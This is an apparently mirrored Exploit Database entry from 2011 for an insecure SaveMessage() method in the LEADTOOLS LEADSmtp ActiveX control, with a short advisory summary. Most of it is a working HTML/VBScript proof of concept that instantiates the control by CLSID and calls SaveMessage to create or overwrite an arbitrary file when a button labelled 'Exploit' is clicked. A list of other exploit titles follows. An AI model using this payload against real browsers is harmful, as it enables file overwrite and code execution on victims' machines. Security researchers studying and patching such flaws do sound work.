LeadTools Imaging LEADSmtp – ActiveX Control ‘SaveMessage()’ Insecure Method

Exploit Database
11 阅读

作者： High-Tech Bridge SA

日期： 2011-06-23
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/35880/

source: https://www.securityfocus.com/bid/48408/info

LEADTOOLS Imaging LEADSmtp ActiveX control is prone to a vulnerability caused by an insecure method.

Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges. 

<html>
<object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_overwrite"
arg2=True
target.SaveMessage arg1 ,arg2
End Sub

</script>
</html>

last Exploits
LeadTools Imaging LEADSmtp – ActiveX Control ‘SaveMessage()’ Insecure Method的更多信息

Sielco Sistemi Winlog 2.07.14 – Remote Buffer Overflow (Metasploit)：
Microsoft Windows – ‘dnslint.exe’ Drive-By Download：
V-CMS – Arbitrary ‘.PHP’ File Upload / Execution (Metasploit)：
WinComLPD 3.0.2 – Remote Buffer Overflow (Metasploit)：
Avaya IP Office (IPO) < 10.1 - 'SoftConsole' Remote Buffer Overflow (SEH)：
Ruijie Reyee Mesh Router – MITM Remote Code Execution (RCE)：
Talkative IRC 0.4.4.16 – Response Buffer Overflow (Metasploit)：
Freefloat FTP Server 1.0 – ‘MKD’ Remote Buffer Overflow：